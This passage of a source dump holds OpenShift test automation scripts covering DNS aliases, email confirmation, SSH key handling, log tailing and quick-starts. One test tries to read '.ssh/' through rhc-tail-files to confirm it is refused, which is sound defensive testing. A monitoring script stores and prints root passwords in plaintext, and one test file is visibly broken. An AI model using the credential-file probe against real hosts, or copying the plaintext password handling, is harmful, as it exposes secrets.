self.steps_list.append(testcase.TestCaseStep(\"Remove one of the aliases\",\n \"rhc alias remove %s %s -l %s -p '%s' %s\" % (self.app_name, aliases[0], self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"alias: %s should be removed\" % (aliases[0]),\n expect_return=0))\n\n # Access the app using the custom DNS again to see it's unavailable\n self.steps_list.append( testcase.TestCaseStep(\"Access the app using the custom DNS again to see it's unavailable\",\n \"http_proxy='' curl -s -H 'Host: %s' -H 'Pragma: no-cache' __OUTPUT__[2] | grep '%s'\" % (aliases[0], test_html),\n expect_description=\"The custom DNS: %s should be unavailable\" % (aliases[0]),\n expect_return=\"!0\"))\n\n # Access the other alias to see it's available\n self.steps_list.append(testcase.TestCaseStep(\n \"Access the other alias to see it's available\",\n \"http_proxy='' curl -s -H 'Host: %s' -H 'Pragma: no-cache' __OUTPUT__[2] | grep '%s'\" % (aliases[1], test_html),\n expect_description=\"The custom DNS: %s should be available\" % (aliases[1]),\n expect_return=0))\n\n # Remove the other alias\n self.steps_list.append(testcase.TestCaseStep(\"Remove the other alias\",\n \"rhc alias remove %s %s -l %s -p '%s' %s\" % (self.app_name, aliases[1], self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"alias: %s should be removed\" % (aliases[1]),\n expect_return=0))\n\n # Access the app using the custom DNS again to see it's unavailable\n self.steps_list.append(testcase.TestCaseStep(\"Access the app using the custom DNS again to see it's unavailable\",\n \"http_proxy='' curl -s -H 'Host: %s' -H 'Pragma: no-cache' __OUTPUT__[2] | grep '%s'\" % (aliases[1], test_html),\n expect_description=\"The custom DNS: %s should be unavailable\" % (aliases[1]),\n expect_return=\"!0\"))\n\n # Access the app using the rhcloud.com url to see it's available\n self.steps_list.append(testcase.TestCaseStep(\n \"Access the app using the rhcloud.com url to see it's available\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), test_html, \"-H 'Pragma: no-cache'\", 5, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CustomDnsNames)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6949230432510376, "alphanum_fraction": 0.6960716843605042, "avg_line_length": 52.085365295410156, "blob_id": "6a7057ebe3353703e038caffb62a6aa436c6b4b8", "content_id": "6728852f2d81d492f194250af5be076ea61db514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4353, "license_type": "no_license", "max_line_length": 181, "num_lines": 82, "path": "/automation/open/testmodules/UI/web/tc_confirm_email.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium import *\nimport unittest, time, re\nimport baseutils\nimport config\nimport HTMLTestRunner\n\nclass EmailConfirm(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n self.confirm_link=config.confirm_url_express\n# baseutils.update_config_file('environment','confirm_url_express',self,confirm_link)\n \n def test_aa_alogin_without_confirm(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.new_user,config.password)\n baseutils.assert_text_equal_by_css(self,\"Invalid username or password\",\"div.message.error\")\n \n def test_a_confirm_invalid_key(self):\n self.driver.get(config.confirm_url_express_yujzhang_invalidkey)\n baseutils.is_text_equal_by_css(self,\"Email confirmation failed\",\"div.message.error\")\n\n def test_b_confirm_without_key(self):\n self.driver.get(config.nokey_confirm_url(self.confirm_link))\n baseutils.is_text_equal_by_css(self,\"The confirmation link used is missing the key parameter. Please check your link or try registering again.\",\"div.message.error\") \n \n def test_f_confirm_normal_not_accept_terms(self):\n self.driver.get(config.confirm_url_express_yujzhang)\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n baseutils.assert_text_equal_by_css(self,\"Click here to reset your password\",\"p\")\n baseutils.assert_value_equal_by_id(self,config.granted_user2[0],\"login_input\")\n# selenium.focus(selenium,\"pwd_input\")\n baseutils.input_by_id(self,\"pwd_input\",config.granted_user2[1])\n baseutils.click_element_by_css_no_wait(self,\"input.button\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Legal terms\")\n baseutils.assert_element_present_by_link_text(self,\"OpenShift Legal Terms and Conditions\")\n baseutils.assert_text_equal_by_css(self,\"Sign in\",\"a.sign_in\")\n self.driver.get(self.base_url+\"/app/\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Legal terms\")\n\n '''\n def test_g_confirm_normal_login_grant_default(self):\n self.driver.get(config.validemail_confirm_url(self.confirm_link))\n baseutils.check_title(self,\"OpenShift by Red Hat | Sign in to OpenShift\")\n baseutils.assert_text_equal_by_css(self,\"Click here to reset your password\",\"p\")\n baseutils.assert_value_equal_by_id(self,config.email(self.confirm_link),\"login_input\")\n baseutils.input_by_id(self,\"pwd_input\",config.password)\n baseutils.click_element_by_css_no_wait(self,\"input.button\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Legal terms\")\n baseutils.assert_element_present_by_link_text(self,\"OpenShift Legal Terms and Conditions\")\n baseutils.assert_text_equal_by_css(self,\"Sign in\",\"a.sign_in\")\n baseutils.click_element_by_id_no_wait(self,\"term_submit\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.assert_text_equal_by_css(self,\"WHAT\\'S EXPRESS?\",\"#about > header > h1\")\n baseutils.is_element_displayed(self,By.LINK_TEXT,\"Quickstart\")\n baseutils.is_element_displayed(self,By.LINK_TEXT,\"Express Console\")\n baseutils.go_to_flex(self)\n baseutils.is_element_displayed(self,By.LINK_TEXT,\"Quickstart\")\n baseutils.is_element_displayed(self,By.LINK_TEXT,\"Flex Console\")\n ''' \n def test_c_confirm_invalid_email(self):\n self.driver.get(config.invalidemail_confirm_url(self.confirm_link))\n baseutils.is_text_equal_by_css(self,\"Email confirmation failed\",\"div.message.error\")\n\n def test_d_confirm_without_email(self):\n self.driver.get(config.noemail_confirm_url(self.confirm_link))\n baseutils.is_text_equal_by_css(self,\"The confirmation link used is missing the emailAddress parameter. Please check your link or try registering again.\",\"div.message.error\")\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n #HTMLTestRunner.main()\n" }, { "alpha_fraction": 0.6287094354629517, "alphanum_fraction": 0.6438923478126526, "avg_line_length": 24.19130516052246, "blob_id": "f147a5c197575bdee66b66d905b32ec77353a453", "content_id": "6a5ffa467cbd160500749c4e6246b46d47994029", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2898, "license_type": "no_license", "max_line_length": 84, "num_lines": 115, "path": "/automation/open/lib/supports/cliutils.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\nUseful interactive functions for building simple user interfaces.\n\n\"\"\"\n\n\n__all__ = ['get_text', 'get_input', 'choose', 'yes_no', 'print_menu_list',\n'find_source_file']\n\nimport sys, os\n\ndef get_text(prompt=\"\", msg=None, input=raw_input):\n\t\"\"\"Prompt user to enter multiple lines of text.\"\"\"\n\n\tprint (msg or \"Enter text.\") + \" End with ^D or a '.' as first character.\"\n\tlines = []\n\twhile True:\n\t\ttry:\n\t\t\tline = input(prompt)\n\t\texcept EOFError:\n\t\t\tbreak\n\t\tif line == \".\": # dot on a line by itself also ends\n\t\t\tbreak\n\t\tlines.append(line)\n\treturn \"\\n\".join(lines)\n\ndef get_input(prompt=\"\", default=None, input=raw_input):\n\t\"\"\"Get user input with an optional default value.\"\"\"\n\tif default:\n\t\tri = input(\"%s [%s]> \" % (prompt, default))\n\t\tif not ri:\n\t\t\treturn default\n\t\telse:\n\t\t\treturn ri\n\telse:\n\t\treturn input(\"%s> \" % (prompt, ))\n\ndef choose(somelist, defidx=0, prompt=\"choose\", input=raw_input):\n\t\"\"\"Select an item from a list.\"\"\"\n\tassert len(list(somelist)) > 0, \"list to choose from has no elements!\"\n\tprint_menu_list(somelist)\n\tdefidx = int(defidx)\n\tassert defidx >=0 and defidx < len(somelist), \"default index out of range.\"\n\ttry:\n\t\tri = get_input(prompt, defidx+1, input) # menu list starts at one\n\texcept EOFError:\n\t\treturn None\n\tif ri:\n\t\ttry:\n\t\t\tidx = int(ri)-1\n\t\texcept ValueError:\n\t\t\tprint >>sys.stderr, \"Bad selection. Type in the number.\"\n\t\t\treturn None\n\t\telse:\n\t\t\ttry:\n\t\t\t\treturn somelist[idx]\n\t\t\texcept IndexError:\n\t\t\t\tprint >>sys.stderr, \"Bad selection. Selection out of range.\"\n\t\t\t\treturn None\n\telse:\n\t\treturn None\n\ndef yes_no(prompt, default=True, input=raw_input):\n\tyesno = get_input(prompt, IF(default, \"Y\", \"N\"), input)\n\treturn yesno.upper().startswith(\"Y\")\n\ndef print_menu_list(clist, lines=20):\n\t\"\"\"Print a list with leading numeric menu choices. Use two columns in necessary.\"\"\"\n\th = max((len(clist)/2)+1, lines)\n\ti1, i2 = 1, h+1\n\tfor c1, c2 in map(None, clist[:h], clist[h:]):\n\t\tif c2:\n\t\t\tprint \"%2d: %-33.33s | %2d: %-33.33s\" % (i1, c1, i2, c2)\n\t\telse:\n\t\t\tprint \"%2d: %-74.74s\" % ( i1, c1)\n\t\ti1 += 1\n\t\ti2 += 1\n\ndef find_source_file(modname):\n\t\"\"\"Find the source file for a module. Give the module, or a name of one.\"\"\"\n\tif type(modname) is str:\n\t\ttry:\n\t\t\tif \".\" in modname:\n\t\t\t\tmodname = __import__(modname, globals(), locals(), [\"*\"])\n\t\t\telse:\n\t\t\t\tmodname = __import__(modname)\n\t\texcept ImportError:\n\t\t\treturn None\n\ttry:\n\t\tbasename, ext = os.path.splitext(modname.__file__)\n\texcept AttributeError: # C modules don't have a __file__ attribute\n\t\treturn None\n\ttestfile = basename + \".py\"\n\tif os.path.isfile(testfile):\n\t\treturn testfile\n\treturn None\n\n\ndef _test(argv):\n\timport string\n\tl = list(string.ascii_letters)\n\tc = choose(l)\n\tprint c\n\tprint find_source_file(\"cliutils\")\n\tprint yes_no(\"testing\")\n\nif __name__ == \"__main__\":\n\timport sys\n\t_test(sys.argv)\n\n" }, { "alpha_fraction": 0.5200709104537964, "alphanum_fraction": 0.5256426334381104, "avg_line_length": 47.447853088378906, "blob_id": "d538d4625ec4ea9162d8cd0514cb0ae0e0e79175", "content_id": "6bb9364060c1d8e2a743829cdecf92303a11747f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7897, "license_type": "no_license", "max_line_length": 212, "num_lines": 163, "path": "/automation/open/testmodules/RT/client/rhc_chk_local_config.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os \nimport common\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US514][UI][rhc-client]rhc domain status ssh-agent test\\n[US514][UI][rhc-client]rhc domain status remote and local pub key match\\n[US514][UI][rhc-client]rhc domain status ssh files permissons\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n common.env_setup()\n\n def finalize(self):\n os.system(\"killall ssh-agent\")\n self.debug(\"Restore libra ssh key pair\")\n os.system(\"test -f /tmp/id_rsa && test -f /tmp/id_rsa.pub && rm -f ~/.ssh/id_rsa ~/.ssh/id_rsa.pub && mv /tmp/id_rsa* ~/.ssh/\")\n self.debug(\"Restore remote ssh key\")\n common.update_sshkey()\n\n\nclass RhcChkLocalConfig(OpenShiftTest):\n def test_method(self):\n\n self.add_step(\"Run rhc domain status without ssh-agent running\",\n \"rhc domain status -l %s -p %s %s\" % (self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"ssh-agent fail because ssh-agent is not running\",\n #expect_str=[\"Could not open a connection to your authentication agent\"],\n expect_return=\"!0\")\n\n self.add_step(\"Run ssh-agent\",\n \"ssh-agent\",\n expect_description=\"ssh-agent starts successfully\",\n expect_return=0,\n expect_str=[\"Agent pid\"],\n output_filter=\"(?<=SSH_AUTH_SOCK=)[^;]*(?=;)\")\n\n self.add_step(\"export SSH_AUTH_SOCK to env\",\n common.set_env,\n function_parameters=[\"SSH_AUTH_SOCK\", \"__OUTPUT__[2]\"],\n expect_description=\"ssh-agent starts successfully\",\n #expect_str=[\"Agent pid\"],\n #output_filter=[\"(?<=SSH_AUTH_SOCK=)[^;]*(?=;)\"],\n expect_return=0)\n\n self.add_step(\"ssh-add libra private key\",\n \"ssh-add ~/.ssh/id_rsa\",\n expect_description=\"libra private key added\",\n expect_return=0,\n expect_str=[\"Identity added\"])\n \n self.add_step(\"Run rhc domain status with ssh-agent running\",\n \"rhc domain status -l %s -p %s %s\" % (self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"rhc domain status detected ssh-agent\",\n expect_return=0,\n expect_str=[\"your system has passed all tests\"])\n\n self.add_step(\"Backup the key pair\",\n \"mv ~/.ssh/id_rsa ~/.ssh/id_rsa.pub /tmp/\",\n expect_description=\"moved libra key pair to /tmp\",\n expect_return=0,\n expect_str=[])\n\n self.add_step(\"Generate a new pair of ssh keys\",\n \"ssh-keygen -t rsa -f ~/.ssh/id_rsa -N ''\",\n expect_description=\"Successfully created a key pair\",\n expect_return=0,\n expect_str=[\"identification has been saved\", \n \"public key has been saved\", \n \"The key fingerprint is\"])\n\n self.add_step(\"Compare the fingerprint of the one ssh-add holds and the new one on the filesystem\",\n \"[ $(ssh-add -l | cut -d' ' -f 2) == $(ssh-keygen -lf ~/.ssh/id_rsa | cut -d' ' -f 2) ] && echo 'yes' || echo 'no'\",\n expect_description=\"The two fingerprints are different\",\n expect_return=0,\n expect_str=['no'],\n unexpect_str=['yes'])\n\n self.add_step(\"Run rhc domain status without the new key loaded\",\n \"rhc domain status -l %s -p %s\" % (self.user_email, self.user_passwd),\n expect_description=\"rhc domain status should fail saying the key not loaded\",\n expect_return=\"!0\",\n expect_str=[\"assert !\\(@@remote_pub_keys\"])\n\n self.add_step(\"ssh-add new libra private key\",\n \"ssh-add ~/.ssh/id_rsa\",\n expect_description=\"new libra private key added\",\n expect_return=0,\n expect_str=[\"Identity added\"])\n \n self.add_step(\"Compare the fingerprint of the newly added key by ssh-add and the one on the filesystem\",\n \"[ $(ssh-add -l | cut -d' ' -f 2 | awk 'NR==2') == $(ssh-keygen -lf ~/.ssh/id_rsa | cut -d' ' -f 2) ] && echo 'yes' || echo 'no'\",\n expect_description=\"The two fingerprints are the same\",\n expect_return=0,\n expect_str=['yes'],\n unexpect_str=['no'])\n\n self.add_step(\"Run rhc domain status again with remote and local key dismatch\",\n \"rhc domain status -l %s -p %s\" % (self.user_email, self.user_passwd),\n expect_description=\"rhc domain status should fail because remote and local key don't match\",\n expect_return=\"!0\",\n expect_str=[\"assert !\\(@@remote_pub_keys\" ])\n\n self.add_step(\"Update the remote ssh key\",\n common.update_sshkey,\n expect_description=\"Remote ssh key altered successfully\",\n expect_return=0)\n\n self.add_step(\"Run rhc domain status again after altering the remote ssh key\",\n \"rhc domain status -l %s -p %s\" % (self.user_email, self.user_passwd),\n expect_description=\"rhc domain status should pass\",\n expect_return=0,\n expect_str=[\"your system has passed all tests\"])\n\n self.add_step(\"Change permissions of ssh key and config file\",\n \"chmod 644 ~/.ssh/id_rsa ~/.ssh/config\",\n expect_return=0)\n\n self.add_step(\"Run rhc domain status again\",\n \"rhc domain status -l %s -p %s\" % (self.user_email, self.user_passwd),\n expect_description=\"rhc domain status should fail because files have incorrect permissions\",\n expect_return=\"!0\",\n expect_str = [\"assert_match\\(permission, perms, error_for\" ],)\n \n self.add_step(\"Change permissions of ssh key and config file\",\n \"chmod 000 ~/.ssh/id_rsa ~/.ssh/config\",\n expect_return=0)\n\n self.add_step(\"Run rhc domain status again\",\n \"rhc domain status -l %s -p %s\" % (self.user_email, self.user_passwd),\n expect_description=\"rhc domain status should fail because files have incorrect permissions\",\n expect_return=\"!0\",\n expect_str=[\"assert_match\\(permission, perms\"])\n\n self.add_step(\"Change permissions of ssh key and config file\",\n \"chmod 600 ~/.ssh/id_rsa ~/.ssh/config\",\n expect_return=0)\n\n self.add_step(\"Run rhc domain status again\",\n \"rhc domain status -l %s -p %s\" % (self.user_email, self.user_passwd),\n expect_description=\"rhc domain status should pass\",\n expect_return=0,\n expect_str=[\"your system has passed all tests\"])\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcChkLocalConfig)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5132474303245544, "alphanum_fraction": 0.5201969146728516, "avg_line_length": 31.89047622680664, "blob_id": "8174c12931bdfc1b8209009d9dfec2d9f3f0f709", "content_id": "237616380bbbe38e591d25b6233d739a557ccdb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6907, "license_type": "no_license", "max_line_length": 149, "num_lines": 210, "path": "/automation/open/testmodules/RT/client/rhc_tail_files_check_RED.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_name = common.getRandomString(10)\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'ruby'\n\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass RHCTailFilesCheck(OpenShiftTest):\n def run_rhc_tail(self, app_name, arguments=None):\n \"Should return non zero if the command\"\n global rhc_tail\n url = OSConf.get_app_url(app_name)\n for i in range(1): #touch that app\n common.grep_web_page(url,'OpenShift')\n cmd=\"rhc-tail-files -a %s -l %s -p %s \"%(app_name, self.user_email, self.user_passwd)\n if arguments!=None:\n cmd += arguments\n print \"CMD=%s\"%cmd\n rhc_tail = subprocess.Popen(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)\n # make stdin a non-blocking file\n try:\n fd = rhc_tail.stdout.fileno()\n fl = fcntl.fcntl(fd, fcntl.F_GETFL)\n fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)\n except Exception as e:\n print \"ERROR: %s\"%str(e)\n return 1\n\n time.sleep(10)\n st = rhc_tail.poll()\n if (st==None):\n st=777\n return st\n\n def do_changes(self, app_name):\n uuid= OSConf.get_app_uuid(app_name)\n try:\n cmd = \"echo Jn316 >> /var/lib/openshift/%s/%s/logs/error_log-*\"%(uuid, app_name)\n (status, output) = common.run_remote_cmd(None, cmd, True)\n cmd = \"echo Jn316 >> /var/lib/openshift/%s/%s/logs/access_log-*\"%(uuid, app_name)\n (status, output) = common.run_remote_cmd(None, cmd, True)\n except:\n return 1\n\n return 0\n\n def verify():\n global rhc_tail\n text = None\n try:\n time.sleep(10)\n text = rhc_tail.stdout.read()\n except Exception as e:\n print \"ERROR: %s\"%str(e)\n return 1\n print \"DEBUG\",text\n obj = re.search(r\"Jn316\", text, re.MULTILINE)\n if obj:\n return 0\n\n return 1\n\n\n def test_method(self):\n rhc_tail = None\n ret_code = 0\n try:\n step=testcase.TestCaseStep(\"Let's have an app\",\n common.create_app,\n function_parameters=[self.app_name, common.app_types[self.app_type], self.user_email, self.user_passwd, False],\n expect_return=0)\n\n (status, output) = step.run()\n\n\n step = testcase.TestCaseStep(\"Run rhc-tail-files\",\n run_rhc_tail,\n function_parameters=[self.app_name],\n expect_return=777)\n\n (status, output) = step.run()\n\n step=testcase.TestCaseStep(\"Append some data to log files directly.\",\n do_changes,\n function_parameters=[self.app_name],\n expect_return=0)\n\n (status, output) = step.run()\n\n\n step=testcase.TestCaseStep(\"VERIFY rhc-tail-files\", verify, expect_return=0)\n\n (status, output) = step.run()\n \"We can now kill the process\"\n rhc_tail.send_signal(signal.SIGINT)\n rhc_tail.kill()\n\n step = testcase.TestCaseStep(\"Check direct call\",\n run_rhc_tail,\n function_parameters=[self.app_name,\n \"--file %s/logs/access_log-%s-000000-EST\"%(self.app_name,time.strftime(\"%Y%m%d\",time.localtime()))],\n expect_return=777)\n (status, output) = step.run()\n time.sleep(10)\n text = rhc_tail.stdout.read()\n obj = re.search(r\"HTTP\",text)\n if obj==None:\n raise testcase.TestCaseStepFail(\"Unable to launch't rhc-tail-files --files\")\n rhc_tail.send_signal(signal.SIGINT)\n rhc_tail.terminate()\n\n '''\n step = testcase.TestCaseStep(\"Check --file *\", \n run_rhc_tail,\n function_parameters=[self.app_name, '--file \"*\"'],\n expect_return=1)\n (status, output) = step.run()\n text = rhc_tail.stdout.read()\n print \"\\nDEBUG\",text\n print \"\\nEND__DEBUG\\n\"\n if (rhc_tail.poll()==None):\n rhc_tail.send_signal(signal.SIGINT)\n rhc_tail.terminate()\n\n '''\n step = testcase.TestCaseStep(\"Check --file .ssh/\",\n run_rhc_tail,\n function_parameters=[self.app_name, \"--file .ssh/\"],\n expect_description=\"We shouldn't be allowed\",\n expect_return=None)\n (status, output) = step.run()\n text = rhc_tail.stdout.read()\n print \"\\nDEBUG\",text\n print \"END__DEBUG\\n\"\n obj = re.search(r\"Could not find any files matching glob\",text)\n if obj==None:\n raise testcase.TestCaseStepFail(\"rhc-tail-files could read .ssh/ files\")\n\n if (rhc_tail.poll()==None):\n rhc_tail.send_signal(signal.SIGINT)\n rhc_tail.terminate()\n\n except testcase.TestCaseStepFail as f:\n print \"ERROR: %s\"%str(f)\n ret_code=1\n except Exception as e:\n print \"ERROR: %s\"%str(e)\n ret_code=254\n\n finally:\n common.command_get_status(\"rm -rf %s\"%self.app_name)\n if (rhc_tail != None):\n try:\n rhc_tail.send_ctrl_c()\n rhc_tail.send_signal(signal.SIGINT)\n rhc_tail.kill()\n rhc_tail.terminate()\n except:\n pass\n\n # sys.exit(ret_code)\n\t\n\tif step.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif step.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RHCTailFilesCheck)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6853725910186768, "alphanum_fraction": 0.6853725910186768, "avg_line_length": 30.97058868408203, "blob_id": "7244e6b234d8c6d2e81d764a8efee9c005086bb7", "content_id": "028dc9ea1811fe80bb6785fa31a282a7f2a7b307", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1087, "license_type": "no_license", "max_line_length": 112, "num_lines": 34, "path": "/automation/open/testmodules/RT/quick_start/quick_start_wolfcms.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\n\nclass QuickStartWolfcms(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"php\"]\n self.config.application_embedded_cartridges = [ common.cartridge_types[\"mysql\"]]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: WolfCMS\"\n self.config.git_upstream_url = \"git://github.com/openshift/wolfcms-example.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"I'm just a demonstration of how easy it is to use Wolf CMS to power a blog.\"\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartWolfcms)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6746987700462341, "alphanum_fraction": 0.6775336861610413, "avg_line_length": 26.134614944458008, "blob_id": "fb3e100982a14a7af22bdf2efb0aadf74189fe7e", "content_id": "271d83895b14a0f4139d874e58fe1c3f3b623fba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1411, "license_type": "no_license", "max_line_length": 80, "num_lines": 52, "path": "/automation/open/Longevity/performance_monitor.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n. ./common_func.sh\n\nserver_config()\n{\nif [ -f server.conf ];then\n\techo \"Will read config from server.conf\"\nelse\n\techo -n \"Please input the number of server you needed to monitor:\"\n\tread all\n\tno=0\n\t>server.conf\n\twhile (($no < $all));do\n\t\techo -n \"Please input the $no server's IP you needed to monitor: \"\n\t\tread server_ip\n\t\techo -n \"Please input (root)Password:\"\n\t\tread server_passwd\n\t\techo -n \"Please input the alias of your server:\"\n\t\tread server_alias\n\t\techo \"$server_alias $server_ip $server_passwd \">>server.conf\n\t\tno=$((no + 1))\n\tdone\nfi\n}\n\nconfirm_and_deployment()\n{\nwhile read server_alias server_ip server_passwd;do\n\techo \"Confirm your input :\"\n\techo_bold \"Alias: $server_alias,\t\tIP: $server_ip,\t\t\tPassword: $server_passwd\"\ndone < server.conf\necho -n \"If these info is all right, please input 'yes' to continue: (yes/no)\"\nread yes\nif [ \"$yes\" = \"yes\" ];then\n\twhile read server_alias server_ip server_passwd;do\n\t\trun scp_task \"record.sh\" $server_ip $server_passwd \"/opt\"\n\tdone < server.conf\nelse \n\techo \"Please run it again!\"\n exit 1\nfi\n}\n\nrun server_config\nrun confirm_and_deployment\ntail -f $1|while read app_info;do\n\techo_blue \"New app created, app info: $app_info\"\n\twhile read server_alias server_ip server_passwd;do\n\techo_green \"####################### $server_alias INFO #######################\"\n\trun task_ssh_root $server_ip $server_passwd \"/opt/record.sh\"\n\tdone < server.conf\ndone\n" }, { "alpha_fraction": 0.6302173137664795, "alphanum_fraction": 0.6350465416908264, "avg_line_length": 29.840425491333008, "blob_id": "06ec1aa9e9dfc5c72d715540791ee43e811f61e5", "content_id": "814b0e022593d1467dc10ee73116ce4a0736b31e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2899, "license_type": "no_license", "max_line_length": 160, "num_lines": 94, "path": "/automation/open/testmodules/RT/client/ruby_rest_client.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n self.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.domain_name = common.get_domain_name()\n self.libra_server = common.get_instance_ip()\n\n tcms_testcase_id=135780\n\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n pass\n\ndef rhc_rest_client_configuration():\n\n # Most of the operations require to be root\n if os.geteuid() != 0:\n print \"You have to run this script as root\"\n return 1\n\n configuration_steps = [\n \"if [[ $(ruby -e 'require \\\"rubygems\\\" ; puts Gem.available?(\\\"rhc-rest\\\")') == 'true' ]]; then gem uninstall rhc-rest -x ; fi\", # Cleaning\n \"cd /tmp\",\n \"if [[ -e os-client-tools ]]; then rm -Rfv os-client-tools/ ; fi\", # Cleaning\n \"git clone git://github.com/openshift/os-client-tools.git\",\n \"cd os-client-tools/rhc-rest/\",\n \"gem build rhc-rest.gemspec\",\n \"gem install rhc-rest\"\n ]\n\n ( ret_code, ret_output ) = common.command_getstatusoutput(\" && \".join(configuration_steps))\n return ret_code\n\n\nclass RubyRestClient(OpenShiftTest):\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Configuring RHC REST client\",\n rhc_rest_client_configuration,\n function_parameters = [ ],\n expect_description = \"The RHC REST client library must be installed successfully\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Testin Rhc::Rest::Client\",\n \"%s/rhc_rest_client_test.rb https://%s/broker/rest %s %s %s\" 